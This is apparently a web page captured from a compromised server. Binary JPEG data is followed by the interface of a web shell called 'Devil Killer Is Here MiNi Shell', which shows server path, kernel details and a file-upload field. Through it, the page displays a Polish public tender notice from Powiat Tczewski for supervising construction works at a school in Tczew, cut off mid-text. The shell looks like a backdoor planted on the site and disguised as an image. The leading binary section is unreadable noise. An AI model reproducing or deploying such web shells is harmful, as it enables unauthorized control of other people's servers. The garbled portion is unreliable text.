JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220620/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220620/0021459301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sprawowanie nadzoru inwestorskiego przy realizacji robót budowlanych w budynku Zespołu Szkół Technicznych przy ul. Sobieskiego 10a w Tczewie <br/>w ramach zadania pn. &#34;Poprawa jakości kształcenia...&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Tczewski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675267</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piaskowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@powiat.tczew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">powiat.tczew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprawowanie nadzoru inwestorskiego przy realizacji robót budowlanych w budynku Zespołu Szkół Technicznych przy ul. Sobieskiego 10a w Tczewie <br/>w ramach zadania pn. &#34;Poprawa jakości kształcenia...&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e7151355-f084-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00214593</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00054433/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Sprawowanie nadzoru Inwestorskiego przy realizacji robót budowlanych dot. poprawy jakości kształcenia zawodowego w szkołach ponadgimnazjalnych Powiatu Tczewskiego - poprzez prace budowlane...</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_tczew <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat_tczew</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Złożenie oferty następuje za pośrednictwem ”Formularza składania oferty” dostępnego<br/>na stronie dotyczącej danego postępowania:<br/>a) Szyfrowanie ofert odbywa się automatycznie przez system.<br/>b) Za datę złożenia oferty przyjmuje się datę jej przekazania w systemie poprzez<br/>kliknięcie przycisku ”ZŁÓŻ OFERTĘ” w drugim kroku i wyświetleniu komunikatu,<br/>że oferta została złożona.<br/>c) Wykonawca może, do upływu terminu do składania ofert, zmienić lub wycofać<br/>ofertę (sposób zmiany lub wycofania oferty określony został w ww. Instrukcji)<br/>d) Z uwagi na to, że złożona oferta jest zaszyfrowana nie można jej edytować w celu<br/>dokonania zmiany. Zmianę oferty należy dokonać poprzez wycofanie uprzednio<br/>złożonej oferty i złożenie nowej.<br/>e) Zmianę lub wycofanie oferty należy zrobić do upływu terminu składania ofert.<br/>f) Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać<br/>zmiany ani wycofać złożonej oferty.<br/>g) Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty<br/>do ilości 10 plików lub spakowanych folderów przy maksymalnej wielkości 150<br/>MB.<br/>13.6 Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie<br/>użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U.<br/>z 2020 r. poz. 1261), określa niezbędne wymagania sprzętowo-aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/> stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s,<br/> komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram,<br/>procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych -<br/>MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/> zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer<br/>minimalnie wersja 10 0.,<br/> włączona obsługa JavaScript,<br/> zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików<br/>.pdf,<br/> platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie<br/>UTF8,<br/> oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja<br/>2016), dalej zwanego rozporządzeniem, Zamawiający informuje, że:<br/>23.1 Administratorem danych osobowych, które zostaną zawarte w Formularzu ofertowym<br/>i załącznikach jest Powiat Tczewski, reprezentowany przez Starostę Tczewskiego<br/>z siedzibą w Tczewie przy ul. Piaskowej 2.<br/>23.2 kontakt do Inspektora Ochrony Danych: inspektor@powiat.tczew.pl lub listownie na<br/>adres: Inspektor Ochrony Danych, Starostwo Powiatowe w Tczewie, ul. Piaskowa 2, 83-<br/>110 Tczew<br/>23.3 Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c rozporządzenia<br/>w celu związanym z przeprowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji zgodnie<br/>art. 275 pkt 1 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych,<br/>zwanej dalej Ustawą oraz w celu archiwizacji na podstawie rozporządzenia Prezesa<br/>Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie Instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu<br/>działania archiwów zakładowych. Dane kontaktowe zawarte w formularzu ofertowym<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. a rozporządzenia, tj. wyrażonej zgody.<br/>23.4 Odbiorcami danych osobowych mogą być: podmioty przetwarzające – którym zlecimy<br/>czynności wymagające przetwarzania danych, np. dostawcy naszych systemów<br/>informatycznych, firmy zajmujące się archiwizacją dokumentów (aktualna lista jest<br/>dostępna u IOD) oraz podmioty upoważnione na podstawie przepisów prawa. Dane<br/>mogą być również udostępniane innym podmiotom, w przypadku i na zasadach<br/>o których mowa w art. 74 Ustawy.<br/>Zamawiający może udostępnić dane osobowe, o których mowa w art. 10 rozporządzenia,<br/>w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale<br/>IX Ustawy, do upływu terminu na ich wniesienie. Dane pozyskane w związku<br/>z postępowaniem o udzielenie zamówienia publicznego mogą być przekazywane<br/>wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie<br/>o udzielenie zamówienia publicznego jest jawne. Ograniczenie dostępu do danych<br/>osobowych może wystąpić jedynie w szczególnych przypadkach, jeśli jest to<br/>uzasadnione ochroną prywatności lub interesem publicznym, zgodnie z art. 18 ust. 5 pkt<br/>1 i 2 Ustawy.<br/>23.5 Dane osobowe będą przechowywane w czasie określonym przepisami prawa,<br/>w szczególności zgodnie z art. 78 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy, a następnie przez okres<br/>archiwizacji, zgodny z rozporządzeniem wymienionym w pkt. 23.3 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Podanie danych osobowych w związku z udziałem w postępowaniu o zamówienie<br/>publiczne nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia<br/>w nim udziału. Wynika to stąd, że w zależności od przedmiotu zamówienia,<br/>zamawiający może żądać ich podania na podstawie przepisów Ustawy oraz wydanych<br/>do niej przepisów wykonawczych, a w szczególności na podstawie Rozporządzenia<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy.<br/>23.7 Wykonawca ma prawo:<br/>a) dostępu do swoich danych. W przypadku gdy wykonanie obowiązków, o których<br/>mowa w art. 15 ust. 1–3 rozporządzenia, wymagałoby niewspółmiernie dużego<br/>wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania,<br/>w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu;<br/>b) ich sprostowania lub uzupełnienia – na podstawie art. 16 rozporządzenia. Zgodnie<br/>z art. 19 ust. 2 Ustawy skorzystanie z tego uprawnienia nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu<br/>ani zmianą postanowień umowy w zakresie niezgodnym z ustawą;<br/>c) żądać ograniczenia ich przetwarzania – na podstawie art. 18 ust. 1 rozporządzenia<br/>Wystąpienie z przedmiotowym żądaniem, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania.<br/>23.8 Wykonawcy nie przysługuje:<br/>a) prawo do usunięcia danych osobowych – w związku z art. 17 ust. 3 lit. b, d lub e<br/>rozporządzenia;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>rozporządzenia;<br/>c) prawo sprzeciwu wobec przetwarzania danych osobowych – na podstawie art. 21<br/>rozporządzenia, gdyż podstawą prawną przetwarzania danych osobowych jest art.<br/>6 ust. 1 lit. c rozporządzenia.<br/>23.9 Dane osobowe nie będą przekazywane do państwa trzeciego/organizacji<br/>międzynarodowej. Dane nie będą przetwarzane w sposób zautomatyzowany w tym<br/>również w formie profilowania.<br/>23.10 Wykonawca ma prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna, iż przetwarzanie danych osobowych jego dotyczących narusza<br/>przepisy rozporządzenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.24.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sprawowanie nadzoru inwestorskiego przy realizacji robót<br/>budowlanych w branżach architektonicznej i elektrycznej w budynku warsztatów<br/>szkolnych Zespołu Szkół Technicznych w Tczewie przy ul. Sobieskiego 10a - w ramach<br/>zadania pn. „Poprawa jakości kształcenia zawodowego w szkołach ponadgimnazjalnych<br/>Powiatu Tczewskiego – poprzez prace budowlane i doposażenie”. Celem tych robót jest<br/>przebudowa pięciu pomieszczeń w budynku warsztatów.<br/>4.2 Roboty budowlane będą prowadzone w czynnym obiekcie szkolnym. Wykonawca<br/>zobowiązany jest do zapoznania się z Wytycznymi Zarządcy budynku dot. prowadzenia<br/>prac w ramach postępowania, które stanowią załącznik do SWZ.<br/>4.3 Roboty objęte nadzorem inwestorskim będą realizowane na podstawie dokumentacji<br/>projektowej pn. Roboty budowlane i remontowe wybranych pomieszczeń budynku Zespołu<br/>Szkół Technicznych w Tczewie przy ul. Sobieskiego 10, w skład której wchodzą:<br/>1) PROJEKT BUDOWLANY<br/>2) Dodatkowy rysunek pn. „wprowadzone późniejsze zmiany.pdf”, wprowadzający<br/>nieistotne zmiany do projektu budowlanego.<br/>3) PROJEKT WYKONAWCZY BRANŻA BUDOWLANA<br/>4) PROJEKT WYKONAWCZY BRANŻA ELEKTRYCZNA<br/>5) SPECYFIKACJA TECHNICZNA WYKONANIA I ODBIORU ROBÓT<br/>BUDOWLANYCH<br/>6) ST1 ROBOTY INSTALACYJNE ELEKTRYCZNE I TELETECHNICZNE<br/>SPECYFIKACJA TECHNICZNA WYKONANIA I ODBIORU ROBÓT<br/>BUDOWLANYCH<br/>7) PRZEDMIAR ROBÓT – BRANŻA BUDOWLANA<br/>8) PRZEDMIAR ROBÓT DODATKOWY – BRANŻA BUDOWLANA DOSTAWA<br/>WRAZ Z MONTAŻEM DODATKOWYCH NAŚWIETLI<br/>W NOWYCH ŚCIANACH DZIAŁOWYCH W POM. NR 1.47 I 1.48.<br/>9) PRZEDMIAR – BRANŻA ELEKTRYCZNA<br/>4.4 Dokumentacja projektowa (poza rysunkiem: „wprowadzone późniejsze zmiany.pdf”)<br/>została opracowana przez POWERSUN Sp. z o.o. w roku 2020. Projekt budowlany jest<br/>opracowaniem wielobranżowym, zawierającym branże: budowlaną, sanitarną<br/>i elektryczną. Projekty wykonawcze są opracowaniami branżowymi, oddzielnie<br/>opracowanymi dla każdej branży. Zamawiający w umowie na roboty budowlane<br/>rezygnuje całkowicie z wykonania robót budowlanych branży sanitarnej, dlatego nie<br/>załącza projektu wykonawczego branży sanitarnej oraz STWiORB dla tej branży.<br/>POWIAT TCZEWSKI<br/>Starostwo Powiatowe w Tczewie<br/>ul. Piaskowa 2, 83-110 Tczew<br/>tel./faks (58) 77 34 800 / (58) 77 34 803<br/>starostwo@powiat.tczew.pl<br/>Sprawowanie nadzoru inwestorskiego przy realizacji robót budowlanych w budynku Zespołu Szkół Technicznych przy ul. Sobieskiego 10a<br/>w Tczewie w ramach zadania pn. „Poprawa jakości kształcenia zawodowego w szkołach ponadgimnazjalnych Powiatu Tczewskiego – poprzez<br/>prace budowlane i doposażenie”.<br/>ZP.272.24.2022 str. 6<br/>4.5 Wykonawca zobowiązany jest przy realizacji usługi nadzoru inwestorskiego<br/>uwzględnić dodatkowe założenia:<br/>a) Zakres umowy na roboty budowlane nie obejmuje branży sanitarnej;<br/>b) Zamawiający w umowie na roboty budowlane rezygnuje całkowicie z dostaw<br/>wyposażenia, które jest ujęte w projekcie budowlanym i przedmiarze<br/>budowlanym;<br/>c) Zamawiający wprowadził do rozwiązań zawartych w dokumentacji projektowej<br/>zmianę, którą Wykonawca robót budowlanych musi uwzględnić przy realizacji<br/>prac – jest ona przedstawiona na rysunku pn. „wprowadzone późniejsze zmiany”.<br/>Polega ona na przesunięciu korytarza, prowadzonego przez salę nr 1.47 do Sali nr<br/>1.48 do przeciwległej ściany pomieszczenia nr 1.47 i ma na celu wykorzystanie<br/>światła dziennego do doświetlenia pomieszczenia 1.47 – przez istniejące naświetla<br/>w ścianie między pomieszczeniami nr 1.45/1.46 i 1.47;<br/>d) W celu odpowiedniego doświetlenia światłem naturalnym Wykonawca robót<br/>budowlanych zobowiązany jest w nowych dwóch ścianach (wydzielającej korytarz<br/>z pom. nr 1.47 i oddzielającej pomieszczenia nr 1.47 i 1.48) zamontować<br/>naświetla jednoszybowe powyżej wysokości 2,05 m – do sufitu (maksymalnie<br/>wykorzystujące powierzchnię tych ścian);<br/>e) Wymiary, w tym lokalizację drzwi wejściowych do korytarza, jak i lokalizację<br/>drzwi wejściowych do pomieszczenia nr 1.47 Wykonawca robót budowlanych<br/>zobowiązany jest przyjąć jak dla „lustrzanego odbicia”.<br/>4.6 Szczegółowy opis robót budowlanych, nad którymi pełniony będzie nadzór inwestorski,<br/>określają załączniki do niniejszej SWZ: Szczegółowy opis przedmiotu zamówienia –<br/>Załącznik Nr 4 do SWZ (zawierający m.in. specyfikacje techniczne wykonania i odbioru robót budowlanych) oraz Projektowane postanowienia umowy – załącznik Nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">110 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwośc pobytów na budowie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>dotyczące:<br/>6.2.1 zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>6.2.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>6.2.3 sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>6.2.4 zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunki udziału w postępowaniu, o których mowa w art. 112<br/>ust. 2 pkt 4 Ustawy jeżeli wykaże, że:<br/>1) wykonał, w okresie ostatnich trzech lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie co najmniej 1 (jedno) zamówienie,<br/>polegające na sprawowaniu nadzoru inwestorskiego lub kierowaniu robotami<br/>budowlanymi w zakresie budowy/ przebudowy/ remontu budynku,<br/>obejmującej minimum branże: ogólnobudowlaną i elektryczną w obiekcie<br/>budowlanym o kubaturze min. 500 m3;<br/>2) dysponuje osobami zdolnymi do wykonania zamówienia wraz z informacjami<br/>na temat ich kwalifikacji zawodowych, uprawnień i wykształcenia,<br/>niezbędnymi do wykonania zamówienia publicznego oraz informacjami<br/>o podstawie do dysponowania tymi osobami, a mianowicie:<br/>a) 1 (jedną) osobą na stanowisko Koordynatora Zespołu Nadzoru<br/>Inwestorskiego posiadającą:<br/> uprawnienia budowlane upoważniające do pełnienia samodzielnej<br/>funkcji technicznej obejmującej kierowanie robotami w specjalności<br/>konstrukcyjno-budowlanej bez ograniczeń w zakresie niezbędnym do<br/>realizacji przedmiotu zamówienia, zgodnie z obowiązującymi<br/>przepisami prawa oraz która w dniu podpisania umowy będzie<br/>członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą<br/>Prawo budowlane oraz ustawą o 